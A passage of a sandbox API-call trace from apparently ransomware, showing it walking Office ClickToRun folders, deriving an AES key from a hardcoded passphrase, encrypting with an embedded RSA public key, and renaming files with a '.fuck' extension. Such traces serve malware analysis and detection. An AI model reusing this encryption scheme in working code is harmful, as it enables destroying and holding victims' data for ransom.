lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.869] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.870] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml.gsg", dwFileAttributes=0x2) returned 0 [0238.870] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x287fb98) returned 1 [0238.873] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0238.873] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.873] CryptHashData (hHash=0x282e3f8, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.873] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x282e3f8, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x282dfb8) returned 1 [0238.873] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.873] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0238.873] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2882ae0) returned 1 [0238.874] CryptImportPublicKeyInfo (in: hCryptProv=0x2882ae0, dwCertEncodingType=0x1, pInfo=0x286c1d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286c208*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286c210*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27ea990) returned 1 [0238.874] CryptEncrypt (in: hKey=0x27ea990, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0238.874] CryptEncrypt (in: hKey=0x27ea990, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2882b68*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2882b68*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0238.874] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2882b68, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0238.874] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0238.874] CryptEncrypt (in: hKey=0x282dfb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0238.874] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0238.874] CloseHandle (hObject=0xffffffff) returned 1 [0238.874] CloseHandle (hObject=0xffffffff) returned 1 [0238.874] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml"), bFailIfExists=0) returned 0 [0238.875] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml", dwFileAttributes=0x0) returned 0 [0238.875] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml.gsg")) returned 0 [0238.876] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml.fuck")) returned 0 [0238.876] CryptDestroyHash (hHash=0x282e3f8) returned 1 [0238.876] CryptDestroyKey (hKey=0x282dfb8) returned 1 [0238.876] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.876] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.876] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0238.876] GetLastError () returned 0x5 [0238.877] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml")) returned 0x20 [0238.877] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml", dwFileAttributes=0x80) returned 0 [0238.877] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.878] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.878] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.gsg", dwFileAttributes=0x2) returned 0 [0238.878] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x287fb98) returned 1 [0238.881] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0238.881] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.881] CryptHashData (hHash=0x282e3f8, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.881] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x282e3f8, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x282dfb8) returned 1 [0238.881] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.881] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0238.881] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2881c88) returned 1 [0238.882] CryptImportPublicKeyInfo (in: hCryptProv=0x2881c88, dwCertEncodingType=0x1, pInfo=0x286c2a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286c2d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286c2e0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2716aa8) returned 1 [0238.882] CryptEncrypt (in: hKey=0x2716aa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0238.882] CryptEncrypt (in: hKey=0x2716aa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2881f30*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2881f30*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0238.882] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2881f30, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0238.882] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27e2810, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0238.882] CryptEncrypt (in: hKey=0x282dfb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e2810*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27e2810*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0238.882] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0238.882] CloseHandle (hObject=0xffffffff) returned 1 [0238.883] CloseHandle (hObject=0xffffffff) returned 1 [0238.883] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml"), bFailIfExists=0) returned 0 [0238.883] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml", dwFileAttributes=0x0) returned 0 [0238.884] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml.gsg")) returned 0 [0238.884] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml.fuck")) returned 0 [0238.884] CryptDestroyHash (hHash=0x282e3f8) returned 1 [0238.885] CryptDestroyKey (hKey=0x282dfb8) returned 1 [0238.885] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.885] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.885] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x282e3f8 [0238.885] FindNextFileA (in: hFindFile=0x282e3f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.885] FindNextFileA (in: hFindFile=0x282e3f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.885] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x282deb8 [0238.885] FindNextFileA (in: hFindFile=0x282deb8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.885] FindNextFileA (in: hFindFile=0x282deb8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.885] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x282dfb8 [0238.885] FindNextFileA (in: hFindFile=0x282dfb8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0238.885] FindNextFileA (in: hFindFile=0x282dfb8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0238.886] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x28467e0 [0238.886] FindNextFileA (in: hFindFile=0x28467e0, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0238.886] FindNextFileA (in: hFindFile=0x28467e0, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0238.886] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2893e30 [0238.886] FindNextFileA (in: hFindFile=0x2893e30, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0238.886] FindNextFileA (in: hFindFile=0x2893e30, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0238.886] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0238.887] GetLastError () returned 0x5 [0238.887] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml")) returned 0x20 [0238.887] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml", dwFileAttributes=0x80) returned 0 [0238.887] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.888] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.888] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.gsg", dwFileAttributes=0x2) returned 0 [0238.889] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x287fb98) returned 1 [0238.891] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0238.891] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.891] CryptHashData (hHash=0x2893eb0, pbData=0x2884f08, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.891] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2893eb0, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2893bb0) returned 1 [0238.891] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.891] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0238.891] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2882bf0) returned 1 [0238.892] CryptImportPublicKeyInfo (in: hCryptProv=0x2882bf0, dwCertEncodingType=0x1, pInfo=0x286c6b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286c6e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286c6f0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2893d70) returned 1 [0238.892] CryptEncrypt (in: hKey=0x2893d70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0238.892] CryptEncrypt (in: hKey=0x2893d70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2882618*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2882618*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0238.892] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2882618, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0) returned 0 [0238.892] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27e2810, lpNumberOfBytesRead=0x2b9cacc*=0x0, lpOverlapped=0x0) returned 0 [0238.892] CryptEncrypt (in: hKey=0x2893bb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e2810*, pdwDataLen=0x2b9cacc*=0x0, dwBufLen=0x400 | out: pbData=0x27e2810*, pdwDataLen=0x2b9cacc*=0x10) returned 1 [0238.892] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0) returned 0 [0238.892] CloseHandle (hObject=0xffffffff) returned 1 [0238.892] CloseHandle (hObject=0xffffffff) returned 1 [0238.893] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml"), bFailIfExists=0) returned 0 [0238.893] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml", dwFileAttributes=0x0) returned 0 [0238.893] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml.gsg")) returned 0 [0238.894] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml.fuck")) returned 0 [0238.894] CryptDestroyHash (hHash=0x2893eb0) returned 1 [0238.894] CryptDestroyKey (hKey=0x2893bb0) returned 1 [0238.894] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.895] FindNextFileA (in: hFindFile=0x2893e30, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0238.895] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0238.895] GetLastError () returned 0x5 [0238.895] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml")) returned 0x20 [0238.895] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml", dwFileAttributes=0x80) returned 0 [0238.895] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.896] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml.gsg"), 